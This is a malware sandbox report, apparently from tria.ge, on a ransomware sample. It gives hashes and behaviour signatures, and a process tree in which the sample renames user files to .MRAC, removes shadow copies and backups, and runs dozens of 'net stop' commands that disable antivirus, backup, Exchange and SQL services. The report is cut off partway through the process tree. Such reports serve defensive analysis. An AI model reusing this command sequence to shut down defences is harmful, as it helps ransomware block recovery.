Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
26/12/2021, 08:08
Static task
static1
Behavioral task
behavioral1
Sample
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe
-
Size
338KB
-
MD5
b99ce03482978a861c883bb772be3b25
-
SHA1
84ecf8f8b0de2dbb3df4b99766a84143e49eaa00
-
SHA256
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91
-
SHA512
a9261830ed6a6c93fcd6fd7c8483d917f2b4235bc9dd586eac9d10bdb6ca2872c6101ea512ecc2abc176a60afa576aa0856db25c66bc29bf81fe2a11c94875c1
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3352 bcdedit.exe 3372 bcdedit.exe -
pid Process 3388 wbadmin.exe 3468 wbadmin.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\WriteRepair.tif => C:\Users\Admin\Pictures\WriteRepair.tif.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe File renamed C:\Users\Admin\Pictures\CompareGet.raw => C:\Users\Admin\Pictures\CompareGet.raw.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe File renamed C:\Users\Admin\Pictures\DisconnectRegister.tif => C:\Users\Admin\Pictures\DisconnectRegister.tif.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe File renamed C:\Users\Admin\Pictures\GrantSkip.tif => C:\Users\Admin\Pictures\GrantSkip.tif.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe File renamed C:\Users\Admin\Pictures\SuspendPublish.raw => C:\Users\Admin\Pictures\SuspendPublish.raw.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe File renamed C:\Users\Admin\Pictures\UnprotectComplete.tif => C:\Users\Admin\Pictures\UnprotectComplete.tif.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe File renamed C:\Users\Admin\Pictures\WaitPublish.raw => C:\Users\Admin\Pictures\WaitPublish.raw.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe File renamed C:\Users\Admin\Pictures\WatchGet.png => C:\Users\Admin\Pictures\WatchGet.png.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe -
Deletes itself 1 IoCs
pid Process 3820 Cmd.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4052 vssadmin.exe 3264 vssadmin.exe -
Kills process with taskkill 45 IoCs
pid Process 3788 taskkill.exe 3032 taskkill.exe 3232 taskkill.exe 3208 taskkill.exe 3380 taskkill.exe 3572 taskkill.exe 3836 taskkill.exe 3884 taskkill.exe 3908 taskkill.exe 2664 taskkill.exe 3136 taskkill.exe 3980 taskkill.exe 3160 taskkill.exe 3356 taskkill.exe 3428 taskkill.exe 3452 taskkill.exe 3524 taskkill.exe 3620 taskkill.exe 2940 taskkill.exe 3012 taskkill.exe 3860 taskkill.exe 3956 taskkill.exe 3668 taskkill.exe 3812 taskkill.exe 3332 taskkill.exe 3716 taskkill.exe 2556 taskkill.exe 3256 taskkill.exe 3500 taskkill.exe 3692 taskkill.exe 3740 taskkill.exe 3280 taskkill.exe 3304 taskkill.exe 3476 taskkill.exe 3548 taskkill.exe 3596 taskkill.exe 4004 taskkill.exe 3088 taskkill.exe 3112 taskkill.exe 3932 taskkill.exe 3184 taskkill.exe 3404 taskkill.exe 4028 taskkill.exe 3644 taskkill.exe 3764 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3844 PING.EXE -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe Token: SeDebugPrivilege 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe Token: SeDebugPrivilege 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe Token: SeBackupPrivilege 3076 vssvc.exe Token: SeRestorePrivilege 3076 vssvc.exe Token: SeAuditPrivilege 3076 vssvc.exe Token: SeIncreaseQuotaPrivilege 3520 wmic.exe Token: SeSecurityPrivilege 3520 wmic.exe Token: SeTakeOwnershipPrivilege 3520 wmic.exe Token: SeLoadDriverPrivilege 3520 wmic.exe Token: SeSystemProfilePrivilege 3520 wmic.exe Token: SeSystemtimePrivilege 3520 wmic.exe Token: SeProfSingleProcessPrivilege 3520 wmic.exe Token: SeIncBasePriorityPrivilege 3520 wmic.exe Token: SeCreatePagefilePrivilege 3520 wmic.exe Token: SeBackupPrivilege 3520 wmic.exe Token: SeRestorePrivilege 3520 wmic.exe Token: SeShutdownPrivilege 3520 wmic.exe Token: SeDebugPrivilege 3520 wmic.exe Token: SeSystemEnvironmentPrivilege 3520 wmic.exe Token: SeRemoteShutdownPrivilege 3520 wmic.exe Token: SeUndockPrivilege 3520 wmic.exe Token: SeManageVolumePrivilege 3520 wmic.exe Token: 33 3520 wmic.exe Token: 34 3520 wmic.exe Token: 35 3520 wmic.exe Token: SeIncreaseQuotaPrivilege 3520 wmic.exe Token: SeSecurityPrivilege 3520 wmic.exe Token: SeTakeOwnershipPrivilege 3520 wmic.exe Token: SeLoadDriverPrivilege 3520 wmic.exe Token: SeSystemProfilePrivilege 3520 wmic.exe Token: SeSystemtimePrivilege 3520 wmic.exe Token: SeProfSingleProcessPrivilege 3520 wmic.exe Token: SeIncBasePriorityPrivilege 3520 wmic.exe Token: SeCreatePagefilePrivilege 3520 wmic.exe Token: SeBackupPrivilege 3520 wmic.exe Token: SeRestorePrivilege 3520 wmic.exe Token: SeShutdownPrivilege 3520 wmic.exe Token: SeDebugPrivilege 3520 wmic.exe Token: SeSystemEnvironmentPrivilege 3520 wmic.exe Token: SeRemoteShutdownPrivilege 3520 wmic.exe Token: SeUndockPrivilege 3520 wmic.exe Token: SeManageVolumePrivilege 3520 wmic.exe Token: 33 3520 wmic.exe Token: 34 3520 wmic.exe Token: 35 3520 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1788 wrote to memory of 1912 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 27 PID 1788 wrote to memory of 1912 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 27 PID 1788 wrote to memory of 1912 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 27 PID 1788 wrote to memory of 1912 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 27 PID 1912 wrote to memory of 544 1912 net.exe 29 PID 1912 wrote to memory of 544 1912 net.exe 29 PID 1912 wrote to memory of 544 1912 net.exe 29 PID 1912 wrote to memory of 544 1912 net.exe 29 PID 1788 wrote to memory of 596 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 30 PID 1788 wrote to memory of 596 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 30 PID 1788 wrote to memory of 596 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 30 PID 1788 wrote to memory of 596 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 30 PID 596 wrote to memory of 756 596 net.exe 32 PID 596 wrote to memory of 756 596 net.exe 32 PID 596 wrote to memory of 756 596 net.exe 32 PID 596 wrote to memory of 756 596 net.exe 32 PID 1788 wrote to memory of 1240 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 33 PID 1788 wrote to memory of 1240 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 33 PID 1788 wrote to memory of 1240 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 33 PID 1788 wrote to memory of 1240 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 33 PID 1240 wrote to memory of 1492 1240 net.exe 35 PID 1240 wrote to memory of 1492 1240 net.exe 35 PID 1240 wrote to memory of 1492 1240 net.exe 35 PID 1240 wrote to memory of 1492 1240 net.exe 35 PID 1788 wrote to memory of 112 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 36 PID 1788 wrote to memory of 112 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 36 PID 1788 wrote to memory of 112 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 36 PID 1788 wrote to memory of 112 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 36 PID 112 wrote to memory of 1852 112 net.exe 38 PID 112 wrote to memory of 1852 112 net.exe 38 PID 112 wrote to memory of 1852 112 net.exe 38 PID 112 wrote to memory of 1852 112 net.exe 38 PID 1788 wrote to memory of 688 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 39 PID 1788 wrote to memory of 688 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 39 PID 1788 wrote to memory of 688 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 39 PID 1788 wrote to memory of 688 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 39 PID 688 wrote to memory of 900 688 net.exe 41 PID 688 wrote to memory of 900 688 net.exe 41 PID 688 wrote to memory of 900 688 net.exe 41 PID 688 wrote to memory of 900 688 net.exe 41 PID 1788 wrote to memory of 1832 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 42 PID 1788 wrote to memory of 1832 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 42 PID 1788 wrote to memory of 1832 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 42 PID 1788 wrote to memory of 1832 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 42 PID 1832 wrote to memory of 436 1832 net.exe 44 PID 1832 wrote to memory of 436 1832 net.exe 44 PID 1832 wrote to memory of 436 1832 net.exe 44 PID 1832 wrote to memory of 436 1832 net.exe 44 PID 1788 wrote to memory of 1812 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 45 PID 1788 wrote to memory of 1812 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 45 PID 1788 wrote to memory of 1812 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 45 PID 1788 wrote to memory of 1812 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 45 PID 1812 wrote to memory of 1216 1812 net.exe 47 PID 1812 wrote to memory of 1216 1812 net.exe 47 PID 1812 wrote to memory of 1216 1812 net.exe 47 PID 1812 wrote to memory of 1216 1812 net.exe 47 PID 1788 wrote to memory of 1328 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 48 PID 1788 wrote to memory of 1328 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 48 PID 1788 wrote to memory of 1328 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 48 PID 1788 wrote to memory of 1328 1788 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe 48 PID 1328 wrote to memory of 1904 1328 net.exe 50 PID 1328 wrote to memory of 1904 1328 net.exe 50 PID 1328 wrote to memory of 1904 1328 net.exe 50 PID 1328 wrote to memory of 1904 1328 net.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe"1⤵
- Modifies extensions of user files
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\net.exenet stop Acronis VSS Provider /y2⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Acronis VSS Provider /y3⤵PID:544
-
-
-
C:\Windows\SysWOW64\net.exenet stop Enterprise Client Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Enterprise Client Service /y3⤵PID:756
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos Agent /y2⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Agent /y3⤵PID:1492
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos AutoUpdate Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos AutoUpdate Service /y3⤵PID:1852
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos Clean Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Clean Service /y3⤵PID:900
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos Device Control Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Device Control Service /y3⤵PID:436
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos File Scanner Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos File Scanner Service /y3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos Health Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Health Service /y3⤵PID:1904
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos MCS Agent /y2⤵PID:1752
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos MCS Agent /y3⤵PID:632
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos MCS Client /y2⤵PID:1228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos MCS Client /y3⤵PID:1096
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos Message Router /y2⤵PID:840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Message Router /y3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos SafeStore Service /y2⤵PID:1352
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos SafeStore Service /y3⤵PID:1964
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos Protection System Service /y2⤵PID:1156
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Protection System Service /y3⤵PID:1612
-
-
-
C:\Windows\SysWOW64\net.exenet stop Sophos Web Control Service /y2⤵PID:1616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Web Control Service /y3⤵PID:580
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLsafe /y2⤵PID:524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLsafe /y3⤵PID:756
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLsafe Filter Service /y2⤵PID:1380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLsafe Filter Service /y3⤵PID:584
-
-
-
C:\Windows\SysWOW64\net.exenet stop Symantec System Recovery /y2⤵PID:880
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Symantec System Recovery /y3⤵PID:864
-
-
-
C:\Windows\SysWOW64\net.exenet stop Veeam Backup Service Data Catalog /y2⤵PID:900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Veeam Backup Service Data Catalog /y3⤵PID:988
-
-
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent /y2⤵PID:1120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc /y2⤵PID:1756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:844
-
-
-
C:\Windows\SysWOW64\net.exenet stop Antivirus /y2⤵PID:1268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:1028
-
-
-
C:\Windows\SysWOW64\net.exenet stop ARSM /y2⤵PID:1628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\net.exenet stop BackupExecAgentAccelerator /y2⤵PID:1712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:1500
-
-
-
C:\Windows\SysWOW64\net.exenet stop BackupExecAgentBrowser /y2⤵PID:984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:1704
-
-
-
C:\Windows\SysWOW64\net.exenet stop BackupExecDeviceMediaService /y2⤵PID:588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:472
-
-
-
C:\Windows\SysWOW64\net.exenet stop BackupExecJobEngine /y2⤵PID:484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:584
-
-
-
C:\Windows\SysWOW64\net.exenet stop BackupExecManagementService /y2⤵PID:1852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:1856
-
-
-
C:\Windows\SysWOW64\net.exenet stop BackupExecRPCService /y2⤵PID:396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:1056
-
-
-
C:\Windows\SysWOW64\net.exenet stop BackupExecVSSProvider /y2⤵PID:1824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:2024
-
-
-
C:\Windows\SysWOW64\net.exenet stop bedbg /y2⤵PID:1904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\net.exenet stop DCAgent /y2⤵PID:1700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\net.exenet stop EPSecurityService /y2⤵PID:1376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:544
-
-
-
C:\Windows\SysWOW64\net.exenet stop EPUpdateService /y2⤵PID:908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:776
-
-
-
C:\Windows\SysWOW64\net.exenet stop EraserSvc11710 /y2⤵PID:1204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:940
-
-
-
C:\Windows\SysWOW64\net.exenet stop EsgShKernel /y2⤵PID:1372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:1316
-
-
-
C:\Windows\SysWOW64\net.exenet stop FA_Scheduler /y2⤵PID:276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:1508
-
-
-
C:\Windows\SysWOW64\net.exenet stop IISAdmin /y2⤵PID:1480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:844
-
-
-
C:\Windows\SysWOW64\net.exenet stop IMAP4Svc /y2⤵PID:1684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y3⤵PID:1660
-
-
-
C:\Windows\SysWOW64\net.exenet stop macmnsvc /y2⤵PID:1028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵PID:1964
-
-
-
C:\Windows\SysWOW64\net.exenet stop masvc /y2⤵PID:1928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:1128
-
-
-
C:\Windows\SysWOW64\net.exenet stop MBAMService /y2⤵PID:1736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:756
-
-
-
C:\Windows\SysWOW64\net.exenet stop MBEndpointAgent /y2⤵PID:1368
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:864
-
-
-
C:\Windows\SysWOW64\net.exenet stop McAfeeEngineService /y2⤵PID:1316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:1508
-
-
-
C:\Windows\SysWOW64\net.exenet stop McAfeeFramework /y2⤵PID:988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵PID:1060
-
-
-
C:\Windows\SysWOW64\net.exenet stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:1184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\net.exenet stop McShield /y2⤵PID:1932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵PID:1704
-
-
-
C:\Windows\SysWOW64\net.exenet stop McTaskManager /y2⤵PID:472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:576
-
-
-
C:\Windows\SysWOW64\net.exenet stop mfemms /y2⤵PID:864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:1508
-
-
-
C:\Windows\SysWOW64\net.exenet stop mfevtp /y2⤵PID:1400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:2024
-
-
-
C:\Windows\SysWOW64\net.exenet stop MMS /y2⤵PID:1964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\net.exenet stop mozyprobackup /y2⤵PID:1128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:268
-
-
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer /y2⤵PID:1528
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:1060
-
-
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer100 /y2⤵PID:2024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer110 /y2⤵PID:1720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:776
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeES /y2⤵PID:1008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:544
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS /y2⤵PID:1704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵PID:576
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMGMT /y2⤵PID:1508
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵PID:1200
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMTA /y2⤵PID:576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵PID:1200
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA /y2⤵PID:544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:268
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSRS /y2⤵PID:1200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵PID:2056
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP $ SQL_2008 /y2⤵PID:2064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP $ SQL_2008 /y3⤵PID:2084
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP $ SYSTEM_BGC /y2⤵PID:2092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP $ SYSTEM_BGC /y3⤵PID:2112
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP $ TPS /y2⤵PID:2120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP $ TPS /y3⤵PID:2140
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP $ TPSAMA /y2⤵PID:2148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP $ TPSAMA /y3⤵PID:2168
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ BKUPEXEC /y2⤵PID:2176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ BKUPEXEC /y3⤵PID:2196
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ ECWDB2 /y2⤵PID:2204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ ECWDB2 /y3⤵PID:2224
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ PRACTICEMGT /y2⤵PID:2232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ PRACTICEMGT /y3⤵PID:2252
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ PRACTTICEBGC /y2⤵PID:2260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ PRACTTICEBGC /y3⤵PID:2280
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ PROFXENGAGEMENT /y2⤵PID:2288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ PROFXENGAGEMENT /y3⤵PID:2308
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SBSMONITORING /y2⤵PID:2316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SBSMONITORING /y3⤵PID:2336
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SHAREPOINT /y2⤵PID:2344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SHAREPOINT /y3⤵PID:2364
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SQL_2008 /y2⤵PID:2372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SQL_2008 /y3⤵PID:2392
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SYSTEM_BGC /y2⤵PID:2400
-
